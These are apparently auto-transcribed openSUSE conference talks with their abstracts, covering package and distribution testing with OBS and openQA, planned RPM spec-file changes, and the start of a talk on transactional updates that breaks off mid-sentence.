multiple spec files per package. You would have a test package which is next to the build package definition. Now, we are still on this package, packaging level, the project level. There's more on this level. There are repository install checks which check if the repositories which are generated are installable. More or less what I showed on the level of a single packaging before, you can check does it all install. This is what is done, for example, when a new snapshot for Tumblr is created, same as for Leap, it is checked, can we install packages within there? There are review bots. So for example, the famous example is the legal bot which checks are the licences correct of all the source files. There are further policy checks, for example, regarding the inheritance of the package. Is a Leap package coming from a SLEE source or from a factory source so that we don't have dangling packages which are only Leap but not in the other distributions. And there are development project tests. So some development projects which are a bit bigger already have more and finer tests. For example, the KDE just as well as the GNOME test, they run some tests based on the development project level. So we are not waiting until the end of trying to create a snapshot of Tumblr to say does the latest Git snapshot of KDE work. And there's the so-called staging projects. And these staging projects then again try to, when you create a submit request to have something included, for example, in factory, then this is then checking for multiple things on that level before a package is accepted further into the whole distribution. Okay. So who does that? I would say that is the maintainers of the packages or the build projects. How? One way, just by building it, I would say that is a test. Using the check rule and as well as the approach which I showed with the multi-built package self-test, OBS bots, but also CI systems and containers. For example, using an additional Jenkins instance or containers registry or other tools where we can just check out the latest state from some development project and then in a circle feedback that result before creating submit. And why I would say, well, integration is crucial especially for distribution building when we are talking about multiple versions, architectures and all that variants. So the goal is to identify the package impact before accepting that into the whole system. Okay. And then we are on the next level. That is system level tests. System level test means that we can test end to end the whole operating system in that regard. Now, this is testing the distribution as a whole. We can or we should rely here on all the preintegration test results. So knowing what we tested in before, then we can say, okay, what else could go wrong after I accept the package? Now, what is different now on the level of system? And a good example is booting the system or conducting an installation. This is something which we cannot do when we are talking about a single package. But there are a lot of things which can go wrong. It could be rub, decolonel, some config files which rely on a different config format and all that things. And this on that level directly feeds into the product release decision process or when we are talking about something like rolling release tumbleweed, same as for LEAP and on a similar level, same for SLEE, system tests are conducted and based on that a build or snapshot of tumbleweed is accepted or is discarded. I would say the main workhorse here regarding the classical distribution is open QA. If you haven't seen it, this is one view how it looks like. So what you see there is tumbleweed is being tested and all of these numbers to the right is one single virtual or physical machine test that is conducted. You can see that there is one build for every snapshot of tumbleweed which is conducted and based on the test results in there. This is feeding back into the decision should we release that build of tumbleweed or not. If you are interested later, I would be happy to give you an introduction into open QA. If you know it already, you might not know what is included recently so I would like to present some recent new features which can make the life easier. There is an open QA bootstrap tool for easy installation. So if you think, yeah, open QA was already cool but I don't know how to install that thing, it's too complicated. There is something like a one-click solution now so you can run that. And even that is not necessary to do if you want to try out open QA. It had been already mentioned today in the morning in the home stock. You can run custom test code on production instances because we are relying on some virtual machines or physical machines to conduct the test. It's not necessary that you are trying out tests or some experiments need to be accepted into the main branch before tests can be executed. So there is a way to have just your own Git repository where you are trying out something changing an existing test or adding a new test and that could be conducted on production instance. There is a YAML-based declarative schedule support now. Previously, some of the schedule was definable only in the web UI by selecting some fields which is really easy to do and it's also pretty obvious what is going on there. However, if you want to go a bit further, more professional, then it's good to have the schedule definition itself in a more defined format in the text-based format. So this is what had been done recently based on the YAML text format. And also, there is a reworked interactive developer mode. So if you know the older interactive mode, that one is way more stable now and it's really fun to work with. So what you can do is if you are running a test, then you can interact with a VM while it is running. Of course, it can impact the test result. This is why the individual job then is not regarded anymore for test results. But you can actually interact with a machine for debugging purposes, for example. Okay. So system level test, who is doing that? This is where release management comes into play and also quality assurance. This is also where I am participating as a QA, as a QA employee, as a QA engineer. We focus or we start from system level test. So we don't start from the package level. We rely on something that is done on the package level. Mainly, we try to look at the product as a whole. How is that done? Mainly using VMs, because VMs are easy to scale and they are really isolated and separated. But also using containers. And then there is also different benchmarks executed as well as other testing frameworks which are done within Open QA, but also in other contexts. And why this is done? I would say, well, this is what the user cares about when we are talking about open-suzer as a distribution or as an operating system. You use the system. And this is also what Open QA tries to do. It uses the system as a user would do. But we are not finished with Open QA yet. There is the next level. GUI acceptance test. This is what I would say. This is where Open QA shines. But I was presenting in before system level test which has nothing to do with the UI necessarily. When we are talking about GUI acceptance test, this is, yeah, okay, it needs to look correct, right? And we want to look at applications. They need to look awesome. So we want to preserve that. And for that, we can use Open QA. Which actually I would say is pretty fun to develop tests for because you can take a look on the screen and do what you would also do as a user. Click somewhere and then you ask Open QA to do that. And you have that running in a test. Now, finally, something visual. This is a video recording which is done automatically by Open QA for every single job that it executes. And what you can see here is how Open QA instructs the installer to install an operating system. And after the installation, it locks into the system and then clicks around, starts application and tries it. What you can also see is that this is a bit faster than in real time. So, of course, when we are doing an installation, this is actually conducted in real time. It relies on the performance of the network because we are really downloading and installing the packages as a user would do. It's only afterwards that the installation itself is a bit faster to do here. Okay, this is the full video recording. Later on, it will boot into the system and it will open Firefox, go to another web page and then open a mail client and all that things. I think we do not need to necessarily wait for the whole. However, what I would like to show is the booting process because this is something which is also pretty hard for other test automation tools to automate. So, we are in the installer. We just stopped right before rebooting, collect some logs, then we boot. You saw KDE for a glimpse of a second. Then we log into a text terminal. We call zipper. We conduct some console-based tests. And then later on, after we did that, we log into the graphical session here. We disable the screen saver and we test something about the network and all different kind of applications that we normally ship on the different distributions. We trigger here at least try to poke them a little bit. We cannot have an in-depth test of all the applications and packages on that level because that would mean we would need to run like 20,000 packages on every run, but that's a bit too much. So, we are doing less than that. So, if you want to see the full video, I invite you over to open K, open suzerorg, select any job and just enjoy the show there. Now, go accept and test. Who does that? Again, I would say release management and quality assurance. When we take a look at the results and we take a look like does it still render correctly, otherwise open K test would also fail. How that is done using open K, at least for the distribution experience itself. And why? Because, well, compared to system-level tests, this is what the desktop user cares about. There can be much more in-depth test on the system-level area, but in the end, it matters how it looks like. Okay, but as there was the last level, which is this cloudy area of exploratory and beta testing, and this is, well, manual by definition, I would say, because this is everything that you cannot automate. And this catches what was missed by automation and provides feedback on where to extend test. This section in particular is very much dependent on all of you, on everyone, because, well, we don't know what was missed. We are relying on feedback, and this is also where it can scale out to have something which I mentioned in before, open Ks, mainly relying due to scalability reasons on virtual machines. If you want to go broader and further, then it's very much dependent on specific hardware drivers and all that things. And this is really hard to automate, even though maybe not impossible. So this is what I would call exploratory beta testing. How that is done, well, mainly by using it. So, you know, when Ludwig Nussle is writing an announcement and saying, hey, there's a new version of leap 50, not one, please try it, then we are relying also on the feedback from there. So I hope you're also providing the feedback by creating the proper bug reports, or at least asking on the mailing list, hey, guys, do you also have that problem? Or is that problem no? Why? Well, no automation can be complete. Now, this brings me to the points to take away. Important for me is that testing is no phase. So this is something which you might, for 20 years ago, very traditional, that you would have some development phase, some integration phase, some testing phase, and I would say that is hardly the case. We within SUSE QA we test on a periodic regular base. Everybody that builds packages is doing that all the time. You as users are doing the testing. So it happens all the time, and everyone is involved. It's also important to select the right tool for the purpose. So I presented some tools. I don't have the answer for all of them. And this is only what you can do for the individual jobs, do it in particular. Now, optional, this is something for you to explore further on, on your own. You can click around and provide some links for all the individual steps for one example project that we can follow on with, all the steps of the pyramid which I've shown in individual examples, like pointing to GitHub, OBS, and further. The challenges regarding testing. Well, more tests are good, but how to know what is already tested, that is hard to know. If you're having something tested on a package level, you should know about it on a system level so that you know what they need to add or what not to repeat again. Some project packages are good at this, but how to scale not, everybody does have to write the same level of testing. And tests may fail in any step. But who can keep an overview? Speaking for myself as a Q engineer, it's hard to have an overview and really see what is tested there. I just know that it is, so I can trust that. With this, I'm at the end. Thank you. Okay. So any question, correction, note, single one for now or meet me outside later? Hello. I have a question about packaging maintenance. For example, recently, we have a new version of third fold in Timberwind, but it cannot renew the certificate, SSL certificate anymore because of some segmentation fault. But as a package maintenance, they may not test the package in some certain condition. That's open QA can provide a test for some kind of important packages for servers. Because some people, maybe like me, every night update the system without carrying packages working. If something happens. So I'm not sure I forgot this right. Is this about package dependencies which you might need for a certain version for something to work and you want to test the combination of packages? Maybe. It's not clear why this package doesn't work anymore. But if the package doesn't work with others or the new version itself has some problem, I think this package shouldn't be. So in the end, what one is doing is building your kind of your own distribution because you're having your package which is interested in relying on certain versions which I would say normally you should rely on OBS to provide you that maybe in a custom repository where you include all the other repositories. But then that can be tested. That could also be tested within open QA. Think about you as a user how you would do that. You would add some repositories and then try if that works. We can instruct open QA no problem to do the same by saying just use the latest tumbleweed snapshot plus this repo plus that repo and then see if something works, including upgrades. So yeah, this is possible with the right combination. So thank you all.
How is software within the openSUSE ecosystem tested? What kind of tests exist? Who is doing what? This talk will try to present an overview of how "testing" is done for software developed in the openSUSE ecosystem. The workflow of software contributions to the openSUSE distributions will be shown from testing perspective from upstream source code repos to feedback from users in the released products. Used tools will be mentioned, the testing approaches as well as the people involved. The relation to SLE testing will be described. As this "overview" will not be able to cover all approaches used by the community feedback by the audience in the Q&A part of the talk will be appreciated. Of course, openQA will be included but it is certainly not the only solution to be mentioned ;)
10.5446/54422 (DOI)
Okay, hello. Welcome to my talk. Created some people, even more people actually made it up here, even whether it's great outside and just beer somewhere. So we're talking about spec files and RPM. Who am I? I'm working for Red Hat for quite a while now. I started in 2006. I after about one year, I started getting involved in YUM, which is the updater, the predecessor of DNF. Basically, that's the equivalent to SIPR. And after a year of optimizing it, I realized, well, I'm done here. If I want to do anything else, I need to go down one level. And so I get involved in RPM in around 2008 and have stuck there for some reason. That's actually my second visit to the OpenSUSA conference. I've been here before, but a lot of things have changed. Last time I've been here, it's been 2009, and it were very different times. And I've actually not really been in a conference. We've been hiding in some rooms and doing technical talk into how to merge the different patches that have been in OpenSUSA and in the Fedora tree at that point. So where are we in RPM buys? We've done a few large changes and features, but it's been a while now. So it's like two, two and a half years till we roll them out. File triggers and Polyend dependencies were one of the biggest, especially file triggers are at least in Fedora, a big thing because they've basically changed most of the scriptlets. So there's a huge amount of packages that have been changed. I've actually not looked into OpenSUSA, what's the state there of adoption, but maybe someone can enlighten us on this. So we currently have a huge backlog of mostly smaller features that we are going to release. The idea is to have an alpha release out next week, hopefully. But so over the next Fedora cycle, we want to get the release stabilized and then out. So traditionally, we've in RPM use Fedora as our test bench. So basically we release in an early version of the next release and then stabilize throughout that. So and the thing is, we've been pretty busy with this relates thing on the side. And so basically after that's done, we are now thinking of what's the next big thing, what to do, where to go from here, and what is the most important thing to consider now. And the problem with RPM development is always that the RPM developers are developers and they are not really packages. Yeah, we do have a few packages that we have to take care of, but that's not the basic side thing. And this has led to basically the last decade that mouse changes, even if they have huge impact for packaging, like the file triggers are basically done from an RPM perspective and not from an RPM build perspective. So it's like, how do we want to have this installed on the system properly? Not so much what's the easiest for the package to actually put it into something. So that's basically what something you want to do next and to basically look into specs, files and packaging from a proper package or perspective, see what can be improved and what can be made easier. Another thing that's more probably not that interesting for you, but I had the data lying around. That's the growth of Fedora. I probably always assumed that open source, the data for open source looks basically the same. The exact numbers are not that important. It starts here with 2004 and goes to basically now. And as you can see, it's basically a linear growth in number of packages and also in the number of, in the overall size of distribution. That means the number of work that has to be done, each release gets bigger and bigger and bigger and bigger every time. And there's no sign of just slowing down or stopping at any point. So the only way around this is either to get more and more and more people involved, which is surely an option, but there's only so much you can do there. And the other option is to basically lower the amount of work needed for each update to be able to keep up with that. That's basically all what I said about this. So the question is, what can be removed from the package or what steps can be removed from actually doing updates or creating new packages? What can be automated and what can we remove from the manual work that's needed? So one big area has been Scriptlets. That's kind of solved from an implementation point of view with file triggers. I don't know how far this works in OpenSUSE. Anyone have an idea? Is this used? Are they used on a broader scale? I think that's only one use for something like one. So that's something worth looking into, basically replacing all the Scriptlets in most packages and centralize them. For those who don't know, the file triggers are basically you can run a script based on a file name that's in another package. I don't know. It's possible that Sousa doesn't run that many Scriptlets as we do, but that's not what I heard. Ah, there's an expert. So the idea is basically to do all the Scriptlets in a centralized work and move them out of the packages so the packages get simpler and the packages themselves don't have to care about it, but one central instance does all the work centrally. The next big thing that's going to be the next release is automatic build dependencies that comes from Rust and Go folks. The problem here is that when many of those new languages do have their own package format and they do have all those mid-up data already, like dependencies on what other packages they depend, then it's a pain to synchronize that right now. So there are tools that can read some other Rust or Go package description and turn it into a spec file, but that's not, that's great as a starting point, but it's not something that's very helpful for distribution that does updates because you don't want to overwrite your spec file, you want to keep that and want to keep your history and your patches and everything. You don't want to copy over stuff that gets generated elsewhere all the time. The automatic build dependencies will solve this to some extent. It's basically a build script that's just run after prep and will generate dependencies for the build. It's going to be interesting for the OBS people that probably still sit down there not suspecting anything as it breaks a lot of assumptions of the build, which we have. Right now the assumption is you can just build a source RPM without anything, basically with RPM only, and you can then start a build with the dependencies in there and being guaranteed that it's going to succeed if you have all the dependencies installed. It's going to break, but it's not as bad as I first thought, so you basically have to do another round, read in the new dependencies and restart the build. It's going to be okay. I promise. Maybe. So another thing that's kind of RPM-ish, but not really, that's probably more Fedora-specific and we have to see how to translate to other distributions is I want to get some stuff out of the spec file and using the Git repositories we have the spec files in as data store. I'll elaborate on that. It's a bit more complicated. And for the long-term things, what we want to do is having templates within the spec files that can be maintained centrally. So you can remove some of the boilerplate stuff and have it in central location that does things. There are basically two tools, direction suites. One is this is something to have templates for building. So you have for different languages, prepared build templates that you can use. That's still very vague. In my mind, the question here is what can be centralized, how many configurations do you need and what can actually be saved in complexity or if you need so much in the opposite, it's not worth doing. But we will look into this in more detail. Another thing is building sub-packages is currently kind of a pain. The thing that's currently most complicated is debug packages and it's solved currently by some code somewhere in RPM that basically does them in C code, which is not that beautiful. But there are a lot of other use cases where right now those sub-packages have to be done by hand. But I will also go into details. So what we currently have, if you do an update, you have to create a patch somehow. You have to add it to the spec file. You have to pick a patch number, find out which is the next suitable. Then you have to apply that in prep using the number above. You have to increase the release. You have to add and change log entry. You have to use the release number you just increased from above. You have to add your name and email. Then you have to commit this. I don't know what you do in SUSE. Where do you store your spec files? Do you have...? You have to get into a great VCS in the build service. So you put them somewhere else. I have a macro, so we don't need to remember the patch number in front. That one mod that doesn't match is totally everybody does. It's auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. Auto-set up. I just want to say it, that's your own app. The app is for self-accompaniment. About self-accompaniment. It's something we just showed you, you have something and get it also. So it's a lot of steps. Yeah, we already removed this step here with auto-set up. The next release will allow you to not set a number. So we will auto-number the patches, which makes sense if you use auto-set up because who cares what number the patch has? This is more interesting for us because we have different branches for different releases, so we might want to cherry pick stuff from one branch to another, and this is the total nightmare because there's nothing in here that doesn't give a conflict. Literally. So I will try to look if we can get rid of the change lock by basically generating that from the Git backlog and probably also calculate the release number from the Git by just counting up so that we'll reduce the number of things that can go wrong or be wrong. It also will basically remove all those things that create a merge conflict for us because you basically just put in the patch, the patch adds one line up here, and if it's a conflict that's not that bad, it's just one line somewhere in the moment that might be in the wrong order who cares. You put it in there and then the commit message stays the same and it just does everything else. That's something I want to look into Fedora that will probably take a while till it gets to the point where it's interesting for you guys, but this will probably be some kind of white paper how to do that or what can be done there. So I will probably have a look at that. So I will probably have a look at that. So even with the external cloud, we're still copying the OBS VCO, so it's still in two places, so they have the same problem anyway. Yes, but it's pre-given, so you commit and you get the whole text already pasted into it. Yeah, or you could commit without having to change the file and have those entries in there and pull it from there. Depends. Yeah, I know. Yeah, but... It has a lot of history to the whole process. Yes. Will you make this work with this source? Will you make this work with this source? On? I wrote it this source. Well, the stuff that is in our... As we do within RPM will, of course, be upstream RPM, the other stuff, the problem is that's all basically build system or logic, so it depends on the integration in the build system or the way you store your spec file. So that's... Maybe talking about the patch thingy in the CropFile recording. Yeah, the autosetup stuff is done already and the patch number stuff is going to be the next release. But that's more or less done. We just have to release it. If you want to make it work, you can have it also for different branches. You need to back call it, you know, 29 to 28 to 37... Yeah, we will see how... It'll happen. They didn't like thinking about it. The thing is, the thing is, you're probably... No, the e-bar will make it work. So first, now I don't say anything about what we're doing well, but we can talk about Fedora and with so far been hesitant back porting too many stuff back, we'll see. But that's a topic for another rainy day. That's basically what we're trying to do here. So, the main thing is that it will require build system integration. You will be able to do that also on the command line, of course. So you have to expect that you build my fail on missing build dependencies, even though you already installed all of them that you had in your source app here. So that's basically a main change that is in there. The other thing is, as a packageer, you can probably outsource generating the build dependencies from your package. And it will be... That's one section less that can go wrong if the package has changed. I assume there will be tools for the typical candidates like Rust. Igor is working on that. He's hiding in the background. Yeah, so that's on your doorstep. And I hear the Go people are also interested in using this. The thing is, that's how it's going to start. I can imagine that on the long term, even classical packages may be using this. I mean, it's not that great if you want to get the requirements out of a configure file. But CMake, maybe. Everyone can even convince upstream to basically ship a machine-readable file of dependencies. At some point, if we downstream are able to actually process that and make something useful with it. So I see there's more thing that is more impacted as can have on the long term, but it will probably take a while until all the tooling gets in place and then it actually gets adopted. So another thing when we're looking on the packages, but I've been thinking about packages, is there is a weird conflict about who's actually controlling what in the RPM land. So there's, of course, things that are RPM upstream that we do, and then they are implemented and everyone else has to follow because if we change something, yeah, we changed it. Then there is, of course, a package which has most control over the package itself. And there's a very weird in-between layer of the distribution that has very little control right now. And so it's very difficult to actually centralize stuff out of the packages and bring that in a place where people think about a bigger picture. So we've tried to do that with the file triggers to be able to get the striplets to a central place, but I think in the long term we need to think about more, if there are more places where we can centralize things. And currently that's really difficult because there's no implementation level. Well there's, and I know in open Susan, but in Fedora we have huge amounts of packaging guidelines. Pages, over pages, over pages, over pages. How things are to be done, how they to be named, how they should look like, what you can't and couldn't do, what we shouldn't do, what you might do if you ask someone or what else. The worst thing about all those guidelines is, yeah, there's a package review, but if your package is in, no one cares, so there are all those rules that may or may not be followed and there's no way to actually put them into the world as an entity on their own. And so I hope that we can find ways to, for one, help the package doing the right thing. And on the other hand, giving the distribution or parts of the distributions more control over a set of packages of their interest. I first thought if we can do something on a distribution level, but I think that's not possible. The reason why there's so much control on the package level is because the packages are so different. And that's one of the reasons why RPM is so hard and so complicated because we have to cover basically every possible situation that might be somewhere. And there's no way to fit them all under one solution. But there are a lot of packages that look a lot the same, all the Python packages, all the font packages, all the language packages. So there are a lot of packages that belong together, either by the way they are built or what they contain or how they are related to. And so I think we need to focus if we can find solutions and that allow those packages to be maintained in a more controlled way with a more centralized approach. But that's going to be tricky because those structures don't really exist because there's no point in me having a script saying, well, that's what Python packages should look like. You need basically a group within a distribution that actually takes care of this. This extends to RPM to some extent that we also have a lot of the tools that we already have upstream is our things that we don't really maintain well because we don't know and we don't care, really. So there are all kinds of those dependency generators for different languages and I'm fine. I know Python. I can look at the Python dependency generator and make some sense of it. Then there is a go dependency generator and I have no idea how that's even supposed to work and there are all those other languages. And so we've tried the last year or two, but not succeeded much. We've basically pushed them out and basically hand them over as a separate project that are maintained by different people that actually care about how those packages look like. So I invite everyone, if you're taking care of some of those groups of larger packages, talk to us if you want to get involved. So we can basically hand those adjacent areas over to people that actually care because RPM upstream can't really get involved into all those ever-scrolling number of package families that have special needs and need special care. And one of the things that we want to look into from our feature-wise is how to make this easier and how to offer solutions to those groups that can be actually done. Yeah, you can write macros and RPM, but that's all kind of ugly right now. So it's probably some things can be done if you really want to, but you run into issues very quickly. So if you want to basically, if you want to ship those macros as separate files and automatically set dependencies on those stuff. So there's probably a lot of smaller feature that we will look into over the next year to see if we can make this easier. And one of the goals to centralize those boilerplate code, it's not that interesting, but at least get it done. I've looked at eBuild, which does something very similar to this, those interest groups we need to get in contact with. And the idea is of course to, this will be of course optional, so we are not going to remove the other stuff, but that means on the other hand packages actually will need to be moved more or less by hand or by script to just all new options. One way this could solve is if you put those scripts or templates into separate versions for different releases, you could get rid of all those if lines that litter a lot of our packages. And I hear that's even worse in open source, not pointing fingers, but if you have centralized scripts that are used there, you can have different versions for different releases that does do the right thing without the package even knowing the difference. Hopefully. The other thing is dealing with subpackages. The problem with subpackages in RPM right now is the overall attitude that RPM has in spec files. The spec file right now basically is a consistency check for the software packages. So you have the file list and the file list is there to type in every file to make sure that if there are some file pops up that doesn't belong there, it creates an error and you as a package are supposed to look up what went wrong and fix the list or whatever. And the same thing is also true for subpackages. So as soon as something goes wrong there, you will get an error and the package will not build. And I think we might be able to basically just loosen those rules or be able to loosen those rules basically by a switch to be able to have template packages that will build if everything is right. So you can basically have a double template that will be used and it will swallow all those files that look the right way. So all the include files, we will just move there if there are some. And the behavior will be if there are no files to be included because it's not done see package but some documentation package. Those package will just not be built without generating an error. So you have those templates you can use and it will fail graciously and not bother you. I have some ideas how to do that but it's still brewing in my mind how to do this in detail. In the end it's a question of philosophy, how much convenience you want for the package and how much control you want to bind down how the package actually should work. There is the possibility of course to use the build templates from above to actually include those templates so you could have so that even those sub packages get basically generated automatically and you could have like distribution level includes that would determine what level of sub packages are actually built for those packages that using this. So you could say well we want all the non binary files split out in a separate package. So we would only have the binary stuff in the package and everything else gets a lip no source RPM or something like this. Or you would be able to split out all language files and basically explode every application into like 50 language sub packages and you could switch this on and off basically without even touching the package. So that's basically yeah one interesting thing is how to what to do with files and there is a couple of mechanisms that we would need there like some sub package stealing files from another and or if so the problem is right now files are more or less taken care of very carefully but if you want to enable switch on and sub package you of course have to move the files over there without generating an error in the other package that may list them still. So there's a couple of there so we will need some syntax that will allow to do that without generating errors. And we will also need something to basically append packages that's something that's currently not possible so you cannot have like a second file list for to add files to a package that may be coming from a template. So if you have a double package you might have those other files you want in there too so you will add something like this. So that's the things we're I'm thinking at night. I'm thinking about at night questions comments scared faces. I do have I do have RPM merge for the best comments. Yeah please. My main right is always when the introduction of macros on new features in Tamarind. For us it's very easy to have backport packages and I really hate that you then have to do if conditioners and spec files. So that's why I was asking if you can make it that you can easily backport those features so backporting like rebuilding up here on the order this was still works fine. Yes. The question was about backporting and how can we make it easier to make those new features and new macros to actually work on all the releases that are built from the same spec file and to avoid all the if release version something. So in Fedora what's this to some degree by having actually different get branches so they're not they're not building from the same file. But they're not everyone is willing to split up the spec file into actually different versions so we basically get the same thing. Backporting features is kind of difficult. There's basically I mean there's just there's no magic here. There are two ways to do that. Either you update RPM in the old version that's something a lot of people feel very uncomfortable with and the other thing is basically backporting the single patches which is something we have done but we are trying to avoid in because there's of course a lot of work and may break stuff anyway. But there's no real solution for this. The real solution is not to have too many different versions. Or the other thing what we've actually done in the past is delay the usage of those features for release or two. So you basically try and drain out the old RPM versions that can support it and only use it later on. So we have been waiting 15 years. The thing is we've done that in the past but not for this reason. I think we have successfully broken that in the past because that made life really really hard. Yeah. We can no longer do that. So we're trying to keep up and be faster and that's a good thing. But it balances out. So being slow sometimes has benefits, being fast sometimes has benefits faster. At least from the macro's perspective one of the things that we did for Fedora was if they're just macros that run in the macro engine we just join them and put them into another package and then just force them into the builder for all the older releases. So that works for us for like 90% of feature backboards. When it comes to like they change the way RPM builds works. Yeah. So like I was one you said oh yeah then you don't have numbers anymore and the patch lines and they don't cost conflicts anymore. But that's something that can be done outside of RPM so you don't actually, yeah the missing numbers not really. You have a pre-processed. Yeah. Yeah. That would be a possibility. Yes. Yeah. The comment for me this looks a lot of magic. It scares me. Yeah. Because for me. Why are you scared? Because for me explicit is better than impulsive. So for example my question is you have generate build request. Bring it offline like they have some like C++ which figures out build request for you. But what does it bring to do with a macro and not bring it beforehand before comment. Once you see a macro the other I see the build request for me as a reviewer I read thousands of spec files it's easy to see the difference for example. You might introduce a new build request and I might not know it. Well the main reason so the question was this looks like a lot of magic and why not generate the build request previously in another step. And one of the reason is that we first you need the infrastructure to do the other step. The second thing is those new languages basically yeah you could previously but it's kind of part of the build process actually. So there came they come prepackaged with the information inside and basically using this during the build process makes it harder for us to actually go wrong or break. So it's basically you could do it outside but you need to have all the stuff wrapped around. So you can actually put in the package you can actually have the process of extracting those dependencies as part of the package. Yeah our PM is our PM is all a tooling problem. So we are not hiding them. So this is a comment to that. Yes. by you, we take from this git, we create a source package, source package gets passed to mock, mock runs DNF build depth which extracts those installs, those build depths, then runs RPM build against that. RPM build bombs out with another source package, which then runs DNF build depth against that, creates a new churud that runs the build a second time, and then runs through that, and then that's the final build. Oh my god. Except for the top, except for the top, there is only one that's still soft-haired. Well, at the end of the day, there'll be a final source package, but there's intermediary, no source package, that's created as part of this thing. So the thing is, it's actually, the way it's implemented in RPM, it's actually meant to restart the build, and you can actually restart the build even from the extracted prep from the extracted sources if you want to. So the turnaround in there is very small if you do it properly. So it basically just creates a header with the dependencies in it, and you basically install those into the existing build route and then restart the build. That's all you need to do. Builds have no network. You need to lock, well, you need to. If you copy the RPM to invent, start to VM and DVM only gets the RPM, but it has pre-resolved. So there's no external interaction. There's no secondary resolution process at all. Yeah, that's what will be interesting. I know. So I've been talking to Michael Schroeder and he said. We know the dependencies I can import. I know. That's all one of build service. I know. It's going to be underwatch. We will see that. I've been talking to Michael Schroeder and he said, he thinks he can do it somehow. But. Michael's also died. Yeah. So who am I to question? Have a good day. Have a bad day. Yeah. I'm not repeating that. So I have a pretty simple question. Me as a freelancer, a Java programmer, who working for many clients who are using the Red Hat Enterprise Linux. And sometimes I need to make a package for them. The package can be deployed on their system. So can you describe the proper way how to package a Java simple application? What is the case? There's no such thing as Red Hat. There's a very simple answer. And the answer is no. I need to specify what kind of virtual machine. Yeah, we have people that do Java packaging. That they're not me. Is there any in the communication for the Red Hat Enterprise Linux? Docs.fadoraproject.org. There's a packaging guidelines page. The Java stuff applies to all Red Hat family distributions. Yeah. As we say, we have a lot of packaging guidelines. The problem is probably not that there are too little guidelines. The problem is rather than there are too many. Well, they mostly like season 2. I was just going to say, I was talking to my manager. He said we are now using file triggers in all sorts of places. That's not for libraries. And because we maintain a bunch of the base system, that means everyone else can see the features. OK. Thank you. We are not there yet, but we won't take three years of argument in June to see people. What does the camera ask? So any other questions? Maybe a bit out of the box. I don't remember the name of the guys, but you expect there was this group of former R&B developers that built a package manager that used Python inheritance. So you could have base package Python extended by a page. Oh, they're already gone. I think we're going to be sent to the car. That was the package manager. I like that concept, because basically you normally have to describe the changes between what a thing and what the kind of thing is doing. I know out here there's miles away from that, but I like the thinking. And maybe want to do some really hanky things, like I don't know, using Ginge on the internet and spec files or to simulate some of that. You're getting very close to some of the things that other people are doing right now. So I've not looked at Connery, but that's clearly something I will look into. Can someone? I'm just existing on the C8, Baltimore company. Because all the girls still don't want to help. Yeah. So can someone? I'm kind of chained here. Yeah, I feel OK. I'm not just. OK. Any other questions? Remarks? A very, very stupid one. Why does RPM insist on expanding commented out macros? That's a good question. And that's easy to answer, because there are no comments in RPM. Oh, god. That's not a good answer. Yeah, no. That's actually an answer. The thing is, if you have a hash, that's an comment within a shell. That's part of the shell thing. And RPM is completely oblivious of the fact that you thought you would comment something out. That's something we actually looked into like a half a year ago. And I don't know if you did something about it. But it's something. You're going to add a source of pain. I think we added a warning for that. I'm not one. I'm going to add an error to get master, so that if it's a multi-line macro that is on a comment line, it will blow up instead of letting you do something. Yeah, something like this. Yeah. But that's a get master, which means it will be coming out sometime in the future. No. We're doing an alpha release next week. Wait, what? Wait, you're going to actually do a release? Yeah. That's a plan. Or just get my constraint if you put that patch in. Yeah, that too. But then when having a get like the parts of it, they're around. I have some pump packages which are pigeon-wide because of micro-resolution and sort of sort of plan is to do an alpha release next week and refine that through the next Fedora release cycle, which ends in October or something, November, I think. Yeah, the appendages sent out the chain proposal for RPM-415. So you're free to grab the alpha release as soon as it's out. I mean, maybe later we go two before you push it. I'm not back on the right hand side. Yeah, but of course, yeah, feel free to play around with it. I mean, yeah, we will typically Fedora takes most of the heat of getting the really fresh stuff. But there's really no reason why other people shouldn't try and feel a bit of the pain. Yeah, but setting by patches on RPM makes very hard to test in versions. Yeah, but even if you don't put in a distribution right away, you can play around with it. Yeah, I've been checking whether. I've been thinking about it before. Like that, then free cost of micro-solution, then if you have four variables, then it's getting funded that get one from the stack hour. Can you just open a ticket for with some test guys? Because the micro engine, we have Pavlina, which has looked into the micro engine. I for years have basically refused to even look at it because it's scary on the outside. And maybe it's scary on the inside. How would I know? No. But. So yeah, there's probably still stuff that can be fixed, even if it's code that's 20 years old. When can we get Ellen? I will probably just. Where is a patch? I will probably just merge it as soon as I get back from the conference. Thank God. Thank you. Thank you. Thank you. It's an epic, over like years. And don't get me started. OK, any other questions? I think we're done here. Thank you.
Right now many RPM spec files contain large parts of boiler plate code. In the current development cycle of RPM we try to help reducing this clutter. We hope we can make packaging easier by providing means to have pre-arranged building blocks and offer more control over larger sets of packages. This will also change the relation between RPM as a multipurpose tool and the single package/packager by adding a layer in between take will take care of common tasks. This talk will give a overview of the changes already done and still planned and will allow for discussion and feed back.
10.5446/54425 (DOI)
I'm a research engineer at SUSE and I'm the maintainer of transactional updates. So maybe some of you have heard, watched, visited last year's talk at the Open SUSE conference. So does anybody know what transactional updates are? Some of you? Okay. So this is an introduction for the rest of you. And then I'll talk about the news, the new developments which were developed since last year's talk. So as a research engineer, of course, one of my jobs is to also compare it with other products. And we've seen that Windows is one of those more popular products. And we've seen, we tried to see what are the essentials which are good for, which are popular in Windows. We've seen that one of those core essences of Windows is it has to reboot constantly. So we thought, let's also do it on Linux. You don't seem too convinced. So yeah, we really tried to do that. But yeah, let's see for the real reasons. With regular updates, we currently have a combination of snapper and zipper which are operating on a BDRIF S file system if you're doing a default installation of OpenSUSE. What actually happens is you'll get a new snapshot of your currently running system. Then the system is actually updated and then you get a post snapshot with the news date after the installation. So you can roll back if anything you did after the installation at the start of your system. So that's a good mechanic already, but you have one problem. We have that update in the currently running system. So if anything breaks during the update, you have actually destroyed your current system and you have to do a rollback to your previous snapshot, but your system is down for that time. So let's try to improve that. There are several distributions, not only OpenSUSE, providing transactional updates or atomic updates, which all share that definition of a transactional update. A transactional update has to be atomic, so as I just said, it has to either be fully applied or not applied at all. And the update must not influence your currently running system. You don't want to have services restarted during the update or whatever else will happen during an update. The second criteria, the update can be rolled back. That's what we already have with our current snapper and super implementation, so that's nothing we have to take care about with transactional updates. So what's actually different with transactional updates? We still have our currently running system, where that huge red arrow is pointing at, and whenever you are doing an update or any modification done by your package management software, and package installation or whatever, you'll get a new snapshot. And the update will then run in that new snapshot, so if you type transactional update dub, transactional update up or whatever, PKGN, you get those updates installed into that new snapshot, and the current system doesn't even know of that. So it just continues running and running and running. And as 